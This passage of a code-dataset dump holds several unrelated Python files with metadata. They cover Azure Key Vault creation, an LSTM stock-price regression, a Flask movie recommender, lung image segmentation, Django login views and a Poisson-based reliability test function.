"sub_path": "tests/networking/cisco/autoload/test_cisco_snmp_autoload.py", "file_name": "test_cisco_snmp_autoload.py", "file_ext": "py", "file_size_in_byte": 5316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 10, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 13, "usage_type": "call"}, {"api_name": "cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.CiscoGenericSNMPAutoload", "line_number": 15, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 68, "usage_type": "call"}, {"api_name": "cloudshell.snmp.quali_snmp.QualiMibTable", "line_number": 76, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 73, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 74, "usage_type": "call"}, {"api_name": "cloudshell.devices.standards.networking.autoload_structure.GenericChassis", "line_number": 85, "usage_type": "call"}, {"api_name": "cloudshell.devices.standards.networking.autoload_structure.GenericPort", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "121233864", "text": "import os\n\nfrom msrestazure.azure_active_directory import ServicePrincipalCredentials\nimport os\nimport json\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.keyvault import KeyVaultManagementClient\nfrom azure.mgmt.resource.resources import ResourceManagementClient\n\n# The object ID of the User or Application for access policies. Find this number in the portal\ndef create_keyvault(KV_NAME, GROUP_NAME, OBJECT_ID, location):\n subscription_id = os.environ['SUB']\n\n credentials = ServicePrincipalCredentials(\n client_id=os.environ['CLIENT'],\n secret=os.environ['KEY'],\n tenant=os.environ['TENANT']\n )\n kv_client = KeyVaultManagementClient(credentials, subscription_id)\n resource_client = ResourceManagementClient(credentials, subscription_id)\n\n # You MIGHT need to add KeyVault as a valid provider for these credentials\n # If so, this operation has to be done only once for each credentials\n resource_client.providers.register('Microsoft.KeyVault')\n\n # Create Resource group\n\n resource_group_params = {'location': location}\n resource_client.resource_groups.create_or_update(\n GROUP_NAME, resource_group_params)\n\n # Create a vault\n\n vault = kv_client.vaults.create_or_update(\n GROUP_NAME,\n KV_NAME,\n {\n 'location': location,\n 'properties': {\n 'sku': {\n 'name': 'standard'\n },\n 'tenant_id': os.environ['TENANT'],\n 'access_policies': [{\n 'tenant_id': os.environ['TENANT'],\n 'object_id': OBJECT_ID,\n 'permissions': {\n 'keys': ['all'],\n 'secrets': ['all']\n }\n }]\n }\n }\n )\n", "sub_path": "src/mop/azure/utils/create_keyvault.py", "file_name": "create_keyvault.py", "file_ext": "py", "file_size_in_byte": 1843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "azure.common.credentials.ServicePrincipalCredentials", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "azure.mgmt.keyvault.KeyVaultManagementClient", "line_number": 19, "usage_type": "call"}, {"api_name": "azure.mgmt.resource.resources.ResourceManagementClient", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}]} +{"seq_id": "617089978", "text": "from __future__ import print_function\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nimport math\nimport datetime as dt\n# không hiển thị các cảnh báo của tensorflow\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\n# parameters to be set (\"optimum\" hyperparameters obtained from grid search):\nlook_back = 7\nepochs = 100\nbatch_size = 32\n\n# fix random seed for reproducibility\nnp.random.seed(7)\n\n\n# đọc dữ liệu dùng panda\nprices_dataset = pd.read_csv('prices-split-adjusted.csv', header=0)\n\n# lọc các dữ liệu của Apple\napple = prices_dataset[prices_dataset['symbol']=='AAPL']\n# sắp xếp dữ liệu theo ngày/tháng/năm\napple = apple.sort_values('date')\n\n\n# lưu giá cổ phiếu của Apple với kiểu dữ liệu là float32\napple_stock_prices = apple.close.values.astype('float32')\n\n# bình thường hóa dataset trong khoảng từ 0 tới 1\nscaler = MinMaxScaler(feature_range=(0, 1))\n\napple_stock_prices = np.reshape(apple_stock_prices, (len(apple_stock_prices),1))\napple_stock_prices = scaler.fit_transform(apple_stock_prices)\n# cắt dataset thành 2 phần train và test với tỉ lệ 0.67:0.33\ntrain_size = int(len(apple_stock_prices) * 0.67)\ntest_size = len(apple_stock_prices) - train_size\ntrain = apple_stock_prices[0:train_size,:]\ntest = apple_stock_prices[train_size:len(apple_stock_prices),:]\n\nprint('Split data into training set and test set... Number of training samples/ test samples:', len(train), len(test))\n\n# chuyển mảng giá trị thành một dataset chuỗi thời gian\n# in form \n# X Y\n# t-look_back+1, t-look_back+2, ..., t t+1\n\ndef create_dataset(dataset, look_back):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset)-look_back-1):\n\t\ta = dataset[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset[i + look_back, 0])\n\treturn np.array(dataX), np.array(dataY)\n\n# chuyển mảng giá cổ phiếu của Apple thành một dataset chuỗi thời gian\ntrainX, trainY = create_dataset(train, look_back)\ntestX, testY = create_dataset(test, look_back)\n\n# định hình laij giá trị truyền vào của LSTM theo format [samples, time steps, features]\ntrainX = np.reshape(trainX, (trainX.shape[0], trainX.shape[1], 1))\ntestX = np.reshape(testX, (testX.shape[0], testX.shape[1], 1))\n\n# tạo và fit the LSTM network\nmodel = Sequential()\nmodel.add(LSTM(5, input_shape=(look_back, 1)))\nmodel.add(Dense(1))\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(trainX, trainY, nb_epoch=epochs, batch_size=batch_size)\n\n# tạo ra dự đoán\ntrainPredict = model.predict(trainX)\ntestPredict = model.predict(testX)\n\n\n# invert predictions and targets to unscaled\ntrainPredict = scaler.inverse_transform(trainPredict)\ntrainY = scaler.inverse_transform([trainY])\ntestPredict = scaler.inverse_transform(testPredict)\ntestY = scaler.inverse_transform([testY])\n\n# tính sai số bình phương gốc\ntrainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))\nprint('Train Score: %.2f RMSE' % (trainScore))\ntestScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))\nprint('Test Score: %.2f RMSE' % (testScore))\n\n# phát họa dự đoán thay đổi dữ liệu train \ntrainPredictPlot = np.empty_like(apple_stock_prices)\ntrainPredictPlot[:, :] = np.nan\ntrainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict\n\n# phát họa dự đoán thay đổi dữ liệu test\ntestPredictPlot = np.empty_like(apple_stock_prices)\ntestPredictPlot[:, :] = np.nan\ntestPredictPlot[len(trainPredict)+(look_back*2)+1:len(apple_stock_prices)-1, :] = testPredict\n\n# phát họa baseline và dự đoán\nplt.plot(scaler.inverse_transform(apple_stock_prices),color='b', lw=2.0, label='S&P 500')\nplt.plot(trainPredictPlot,color='g', lw=2.0, label='LSTM train')\nplt.plot(testPredictPlot,color='r', lw=2.0, label='LSTM test')\nplt.legend(loc=3)\nplt.grid(True)\nplt.show()\n\n\n\n", "sub_path": "CodeDemo/LSTMforRegression.py", "file_name": "LSTMforRegression.py", "file_ext": "py", "file_size_in_byte": 4273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 75, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 91, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 98, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 103, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}]} +{"seq_id": "360943889", "text": "from flask import Flask, render_template, request\r\nimport pickle\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom flask_table import Table, Col\r\n\r\n#building flask table for showing recommendation results\r\nclass Results(Table):\r\n id = Col('Id', show=False)\r\n title = Col('Recommendation List')\r\n\r\napp = Flask(__name__)\r\n\r\n#Welcome Page\r\n@app.route(\"/\")\r\ndef welcome():\r\n return render_template('welcome.html')\r\n\r\n#Rating Page\r\n@app.route(\"/rating\", methods=[\"GET\", \"POST\"])\r\ndef rating():\r\n if request.method==\"POST\":\r\n return render_template('recommendation.html')\r\n return render_template('rating.html')\r\n\r\n#Results Page\r\n@app.route(\"/recommendation\", methods=[\"GET\", \"POST\"])\r\ndef recommendation():\r\n if request.method == 'POST':\r\n #reading the original dataset\r\n #movies = pd.read_csv('movies.csv')\r\n\r\n #separating genres for each movie\r\n #movies = pd.concat([movies, movies.genres.str.get_dummies(sep='|')], axis=1)\r\n\r\n #dropping variables to have a dummy 1-0 matrix of movies and their genres\r\n ## IMAX is not a genre, it is a specific method of filming a movie, thus removed\r\n ###we do not need movieId for this project\r\n #categories = movies.drop(['title', 'genres', 'IMAX', 'movieId'], axis=1)\r\n\r\n #initializing user preference list which will contain user ratings\r\n \r\n with open('corrmatrix.pickle', 'rb') as f:\r\n corrmatrix = pickle.load(f)\r\n \r\n corrMatrix = corrmatrix['rating'].droplevel(level=0)\r\n \r\n \r\n \r\n movies_list = [\r\n 'Bad Boys (1995)',\r\n 'Firewalker (1986)',\r\n 'Toy Story (1995)',\r\n 'Alice in Wonderland (1951)',\r\n 'My Chauffeur (1986)',\r\n 'Gang Related (1997)',\r\n \"Jupiter's Wife (1994)\",\r\n 'Godfather, The (1972)',\r\n 'American Pimp (1999)',\r\n \"Killer's Kiss (1955)\",\r\n 'Baraka (1992)',\r\n 'King and I, The (1956)',\r\n \"Mike's Murder (1984)\",\r\n 'Love Is a Many-Splendored Thing (1955)',\r\n \"Star Wars: Episode I - The Phantom Menace (1999)\",\r\n 'Braveheart (1995)',\r\n 'Seven (Se7en) (1995)',\r\n 'Good, The Bad and The Ugly, The (1966)']\r\n \r\n preferences = []\r\n\r\n #reading rating values given by user in the front-end\r\n Action = request.form.get('Action')\r\n Adventure = request.form.get('Adventure')\r\n Animation = request.form.get('Animation')\r\n Children = request.form.get('Children')\r\n Comedy = request.form.get('Comedy')\r\n Crime = request.form.get('Crime')\r\n Documentary = request.form.get('Documentary')\r\n Drama = request.form.get('Drama')\r\n Fantasy = request.form.get('Fantasy')\r\n FilmNoir = request.form.get('FilmNoir')\r\n Horror = request.form.get('Horror')\r\n Musical = request.form.get('Musical')\r\n Mystery = request.form.get('Mystery')\r\n Romance = request.form.get('Romance')\r\n SciFi = request.form.get('SciFi')\r\n Thriller = request.form.get('Thriller')\r\n War = request.form.get('War')\r\n Western = request.form.get('Western')\r\n\r\n #inserting each rating in a specific position based on the movie-genre matrix\r\n preferences.append(int(Action))\r\n preferences.append(int(Adventure))\r\n preferences.append(int(Animation))\r\n preferences.append(int(Children))\r\n preferences.append(int(Comedy))\r\n preferences.append(int(Crime))\r\n preferences.append(int(Documentary))\r\n preferences.append(int(Drama))\r\n preferences.append(int(Fantasy))\r\n preferences.append(int(FilmNoir))\r\n preferences.append(int(Horror))\r\n preferences.append(int(Musical))\r\n preferences.append(int(Mystery))\r\n preferences.append(int(Romance))\r\n preferences.append(int(SciFi))\r\n preferences.append(int(War))\r\n preferences.append(int(Thriller))\r\n preferences.append(int(Western))\r\n\r\n #This funtion will get each movie score based on user's ratings through dot product\r\n tuple_movie_n_rating = list(zip(movies_list,preferences))\r\n\r\n #Generating recommendations based on top score movies\r\n def get_similar(movie_name,rating):\r\n similar_ratings = corrMatrix[movie_name]*(rating-2.5)\r\n similar_ratings = similar_ratings.sort_values(ascending=False)\r\n #print(type(similar_ratings))\r\n return similar_ratings\r\n \r\n def recommendations(list_of_tuple):\r\n similar_movies = pd.DataFrame()\r\n for movie,rating in list_of_tuple:\r\n similar_movies = similar_movies.append(get_similar(movie,rating),ignore_index = True)\r\n \r\n mann = similar_movies.sum().sort_values(ascending=False).index.values\r\n return [m for m in mann if not m in movies_list][:20] \r\n\r\n #def recommendations(X, n_recommendations):\r\n #movies['score'] = get_score(categories, preferences)\r\n #return movies.sort_values(by=['score'], ascending=False)['title'][:n_recommendations]\r\n\r\n #printing top-20 recommendations\r\n output= recommendations(tuple_movie_n_rating)\r\n table = Results(output)\r\n table.border = True\r\n return render_template('recommendation.html', table=table)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)", "sub_path": "Movie_Recommender.py", "file_name": "Movie_Recommender.py", "file_ext": "py", "file_size_in_byte": 5503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_table.Table", "line_number": 8, "usage_type": "name"}, {"api_name": "flask_table.Col", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_table.Col", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "106270402", "text": "import itertools\n\nimport numpy as np\nfrom scipy import ndimage\nfrom skimage.filters import sobel\nfrom skimage.filters import threshold_otsu\nfrom skimage.measure import label, regionprops\nfrom skimage.morphology import binary_dilation\nfrom skimage.morphology import disk, binary_erosion\nfrom skimage.segmentation import clear_border\n\n\ndef segment_lungs(im):\n \"\"\"\n Using a 2D image as input (in the form of an array), this function will generate a binary mask and an output image that both only show the lungs.\n \"\"\"\n ##### BINARIZE IMAGE\n # first anything <0 (as some images are negative)\n im_b = np.where(im < 0, 0, im)\n # then based on otsu thresholding\n thresh = threshold_otsu(im_b)\n binary = im_b > thresh\n\n # invert the image to make the lungs the ROIs\n binary = np.invert(binary)\n\n ##### GENERATE BORDER OF THE BINARIES\n cleared = clear_border(binary)\n\n ##### LABEL DISTINCT BODIES IN IMAGE\n label_image = label(cleared)\n\n ##### KEEP TWO LARGEST AREAS\n areas = [r.area for r in regionprops(label_image)]\n areas.sort()\n if len(areas) > 2:\n for region in regionprops(label_image):\n if region.area < areas[-2]:\n for coordinates in region.coords:\n label_image[coordinates[0], coordinates[1]] = 0\n binary = label_image > 0\n\n ##### EROSION TO GET RID OF ARTIFACTS\n selem = disk(4)\n binary = binary_erosion(binary, selem)\n\n ##### DILATION TO BRING BACK LUNG INFORMATION\n selem = disk(4)\n binary = binary_dilation(binary, selem)\n\n ##### FILL SMALL HOLES\n edges = sobel(binary)\n binary = ndimage.binary_fill_holes(edges)\n\n return binary\n\n\ndef bbox2_ND(img):\n \"\"\"\n Generates a bounding box for 3D image.\n \"\"\"\n N = img.ndim\n out = []\n for ax in itertools.combinations(range(N), N - 1):\n nonzero = np.any(img, axis=ax)\n out.extend(np.where(nonzero)[0][[0, -1]])\n b = tuple(out)\n img_roi = img[b[4]:b[5], b[2]:b[3], b[0]:b[1]]\n return img_roi\n", "sub_path": "utils/preprocessing_utils.py", "file_name": "preprocessing_utils.py", "file_ext": "py", "file_size_in_byte": 2018, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.where", "line_number": 19, "usage_type": "call"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.invert", "line_number": 25, "usage_type": "call"}, {"api_name": "skimage.segmentation.clear_border", "line_number": 28, "usage_type": "call"}, {"api_name": "skimage.measure.label", "line_number": 31, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 34, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 37, "usage_type": "call"}, {"api_name": "skimage.morphology.disk", "line_number": 44, "usage_type": "call"}, {"api_name": "skimage.morphology.binary_erosion", "line_number": 45, "usage_type": "call"}, {"api_name": "skimage.morphology.disk", "line_number": 48, "usage_type": "call"}, {"api_name": "skimage.morphology.binary_dilation", "line_number": 49, "usage_type": "call"}, {"api_name": "skimage.filters.sobel", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.ndimage.binary_fill_holes", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 53, "usage_type": "name"}, {"api_name": "itertools.combinations", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "112783323", "text": "from django.shortcuts import render, redirect\nimport bcrypt\nfrom .models import *\nfrom django.contrib import messages\n\n# Create your views here.\ndef index(request):\n \n return render(request, \"users/index.html\")\n\n#######################\n# REGISTER NEW USER\n#####################\ndef process_reg(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(\"/\")\n else:\n hash1 = bcrypt.hashpw(request.POST[\"pw\"].encode(), bcrypt.gensalt())\n new_user = User.objects.create(first_name=request.POST[\"fname\"], last_name=request.POST[\"lname\"],email=request.POST[\"email\"],pw_hash=hash1)\n request.session[\"userid\"] = new_user.id\n messages.success(request, \"Successfully registered!\")\n return redirect(\"/success\")\n\n#########################\n# AJAX EMAIL VALIDATION\n########################\ndef email(request):\n found = False\n result = User.objects.filter(email=request.POST[\"email\"])\n if len(result) > 0:\n found = True\n context = {\n \"found_html\": found\n }\n return render(request, \"users/partials/email.html\", context)\n\n#######################\n# DISPLAY SUCCESS PAGE\n#######################\ndef success(request):\n if not \"userid\" in request.session:\n messages.error(request, \"You are not logged in.\")\n return redirect(\"/\")\n else:\n user = User.objects.get(id=request.session[\"userid\"])\n context = {\n \"user_html\": user\n }\n return render(request, \"users/success.html\", context)\n\n#######################\n# LOGIN\n######################\ndef login(request):\n # email match?\n try:\n User.objects.get(email=request.POST[\"email\"])\n except:\n messages.error(request,\"User does not exist.\")\n return redirect(\"/\")\n email_match = User.objects.get(email=request.POST[\"email\"]) \n if bcrypt.checkpw(request.POST[\"pw\"].encode(), email_match.pw_hash.encode()):\n request.session[\"userid\"] = email_match.id\n messages.success(request, \"Successfully logged in!\")\n return redirect(\"/success\")\n else:\n messages.error(request, \"Incorrect password.\")\n return redirect(\"/\")\n\n#########################\n# LOGOUT\n##########################\ndef logout(request):\n request.session.clear()\n return redirect(\"/\")", "sub_path": "login_reg/apps/users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 19, "usage_type": "call"}, {"api_name": "bcrypt.hashpw", "line_number": 21, "usage_type": "call"}, {"api_name": "bcrypt.gensalt", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 45, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 62, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "bcrypt.checkpw", "line_number": 65, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 67, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 70, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 70, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "297589009", "text": "\nimport numpy as np\nimport scipy.stats as spstats\nimport scipy.optimize as spopt\n\n\ndef fixed_length_test(lbd0, lbd1, T):\n \"\"\"Fixed Length Reliability Demonstration Test.\n\n Args:\n lbd0 (float): failure rate [time^-1].\n lbd1 (float): failure rate [time^-1].\n T (float): total observation period [time]\n Returns:\n the maximum number of acceptable failures,\n the discrimination ratio of the hypothesis test\n the producer's risk alpha\n the consumer's risk beta\n\n so that either:\n - the producer's risk is equal to the consumer's risk and it is a small\n as possible (within the constraints)\n - or, if the above is not possible, then the absolute value of the\n difference between the two risks is minimized\n\n The solution method is based on the following facts:\n 1.- for a fixed time test alpha is a decreasing function of c\n 2.- for a fixed time test beta is an increasing function of c\n 3.- for a fixed time test beta is a decreasing function of the\n discrimination ratio\n 4.- because of 1, 2 and 3 for a given c there are three possibilities:\n i.- alpha > beta_max > beta_min\n ii.- beta_max > alpha > beta_min\n iii.- beta_max > beta_min > alpha\n 5.- Furthermore, as c increases you always move towards iii, i.e. if\n for c1 you are in case ii then for c1 + 1 you will be in case ii\n or iii but not i\n\n \"\"\"\n # Parameters\n d_min = 1.0\n d_max = 5.0\n # Initialize Values\n c = 0\n while True:\n # Calculate values\n alpha = np.array([1.0 - spstats.poisson.cdf(c, lbd0 * T)])\n beta_max = np.array([spstats.poisson.cdf(c, lbd0 * d_min * T)])\n beta_min = np.array([spstats.poisson.cdf(c, lbd0 * d_max * T)])\n # Select best case for this iteration\n alpha_opt_i = alpha\n if alpha < beta_min:\n d_opt_i = d_max\n beta_opt_i = beta_min\n diff_opt_i = np.abs(alpha_opt_i - beta_opt_i)\n elif alpha > beta_max:\n d_opt_i = d_min\n beta_opt_i = beta_max\n diff_opt_i = np.abs(alpha_opt_i - beta_opt_i)\n else:\n beta_opt_i = alpha\n def beta_root(d):\n return spstats.poisson.cdf(c, lbd0 * d * T) - beta_opt_i\n d_opt_i = spopt.brentq(beta_root, d_min, d_max)\n diff_opt_i = 0.0\n\n # Select best results overall\n if 'c_opt' not in locals():\n c_opt = c\n d_opt = d_opt_i\n alpha_opt = alpha_opt_i\n beta_opt = beta_opt_i\n diff_opt = diff_opt_i\n else:\n # Check if the solution in the current step has equal risk\n if np.allclose(diff_opt_i, 0.0):\n if alpha_opt_i < alpha_opt:\n c_opt = c\n d_opt = d_opt_i\n alpha_opt = alpha_opt_i\n beta_opt = beta_opt_i\n diff_opt = diff_opt_i\n elif diff_opt_i < diff_opt:\n c_opt = c\n d_opt = d_opt_i\n alpha_opt = alpha_opt_i\n beta_opt = beta_opt_i\n diff_opt = diff_opt_i\n\n # This is the condition to break out the loop\n if alpha >= beta_min:\n c += 1\n else:\n break\n return c_opt, d_opt, alpha_opt[0], beta_opt[0]\n", "sub_path": "ramtools/demonstration.py", "file_name": "demonstration.py", "file_ext": "py", "file_size_in_byte": 